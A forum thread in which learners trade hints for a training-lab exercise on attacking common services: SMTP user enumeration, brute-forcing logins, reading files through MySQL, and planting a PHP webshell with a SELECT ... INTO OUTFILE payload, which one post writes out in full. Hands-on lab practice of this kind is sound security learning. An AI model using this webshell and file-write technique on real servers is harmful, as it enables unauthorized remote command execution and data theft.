Attacking Common Services - Easy

Hello! Has anyone managed to upload the file the second way via FTP (PORT/EPRT)? Give me a hint how?

port 4443

  1. Enumeration
  2. Brute-Force (users.list/rockyou.txt)
  3. Attacking SQL Databases (Write Local Files) → SELECT “" into outfile "C:\xa\htd***\***.php”
1 Like

Hi guys, I managed to get the flag by manually ‘bruteforcing’ the LOAD_FILE path. However I still don’t get how to do it with a webshell. I tried uploading the webshell in multiple directories but I was just able to execute dir and whoami, I also used revshells.com to generate multiple shells and uploading them but I couldn’t link them back to my listener, could anybody please explain me how they did it?

Are you sure about that? Don’t give up and try again maybe you are putting something wrong.

Hey guys just in case you still need help. There is two ways to get the flag. One is thru the FTP and using the tool “CURL” and the other is thru MYSQL using SELECT LOAD(‘PATH’); and other commands that are at the text from the chapter Attacking SQL Services (YOU CAN FIND THE PATH IN HERE BY READING OTHER PEOPLE POST, OR IN YOUR VICTIM MACHINE). Both attacks follow the chapters from Attacking Common Services. I did both just to learn more ways to attack a machine. Good luck for those that are still struggle and for those that will be reading this post in the future.! By the way I got the flag twice. ;).

1 Like

how did you manage to upload a php shell via ftp and get it executed , using curl i can only view webshell content not executing it

1 Like

Yes, there is a path to the Apache server where you can upload the webshell. Carefully read the files and you will find the path. Then you can use CURL to execute commands. I found it helpful then the execute commands thru the browser. Last, don’t forget to try to do it thru MYSQL it is worth it do it both ways. Just remember it will be the same page if you want to upload a webshell or if you can try guess where is the flag, you can do it by using SELECT LOAD(‘Path to flag.txt’) just try to guess if Fiona has it or Admin has it.

Hey thanks , i already managed to get flag.Txt using mysql path . im stuck on ftp path , how did u manage to upload the webshell through ftp in apache directory , i can only put the webshell in ftp directory , i tried directory traversal but nothing worked

Guys, why while I’m using smtp-user-enum with provided list users.list I get 0 results? I tried both on my kali and from parrot browser instance, same result; is there alternative list which needs to be found first?

Edit: Nevermind, it worked the other day.

I just recommend you using this tip" SELECT LOAD_FILE(‘/U**/Adm****/***/flag.txt’);" when you have already got creds of mysql.

What is the point of providing a password list if the password isn’t in it? Isn’t academy meant to be a learning platform? What exactly am I meant to be learning while waiting an hour to crack a password? The point is knowing what commands to run and running them correctly, not in guessing the correct password list. This is unnecessarily time consuming and frustrating.

3 Likes

This took me 10x longer than I expected. I will just say this to people who came here like me disgruntled and desperate to find help. There’s multiple ways of tackling this lab, but I suggest you just stick with mainly SMTP and MySQL. You’ll get info from initially browsing the website and later when you do my advice, but I don’t think finding website exploits embodies the spirit of the module. You don’t even need metasploit for it. For anyone stumped with brute-forcing the different services, you might have overlooked one obvious service after being done enumerating it once :wink:. I’ll say for the rest of the lab, I think it’s better if you practice writing a webshell and then going from there whether you wanna make a reverse one. Browsing the php website will kinda help you kinda map out where you write the file.

Agreed!

There are multiple paths to solve this box.

I managed to solve using ftp (using an existing vulnerability, took me awhile to understand the syntax) and managed to upload and execute an reverse shell.

I am somehow “stuck” in the mysql pathway. I am able to use load to directly find the flag, and save a php web shell and execute it. However, I am stuck trying to save a reverse shell and execute it.

Is saving a reverse shell using mysql not possible? I encounter syntax issue when saving the reverse shell due to the use of ’ and ", which also caused problem when executing the shell

I used sql injection against the Database and was able to upload a webshell to the server and then get the flag.

Basically you need to do:

  1. Enumerate the smtp to find the username
  2. Use Hydra or Medusa to bruteforce against the smtp server using a password list (do not use the one given in the module).
  3. Use the obtained credentials to try out the servers, found a mysql server and log in.
  4. Find a table that contains at least one column.
  5. Apply your sql injection technique
    SELECT * FROM table WHERE table_id=1 UNION ALL SELECT "<?php system($_REQUEST['cmd']); ?>",'N' INTO OUTFILE '<path to your server site>/webshell.php'
  6. Go to the web browser, type in http://10.129.x.x/<path_to_server_site>/webshell.php?cmd=type <path_to_flag>

you can do a webshell, the tricky part is to find a table that contains at least one column and leverage sql injection using UNION keyword.

brute force the MySQL? it will be blocked by server after a few times

Hi,
i tried all smtp-user-enum modes (VRFY, ECPT, EXPN) on Port 25 and 587 but only get a “valid address is required” or “502 VRFY disallowed”.
I also started the machine a couple times new but nothing work.
I’m confused.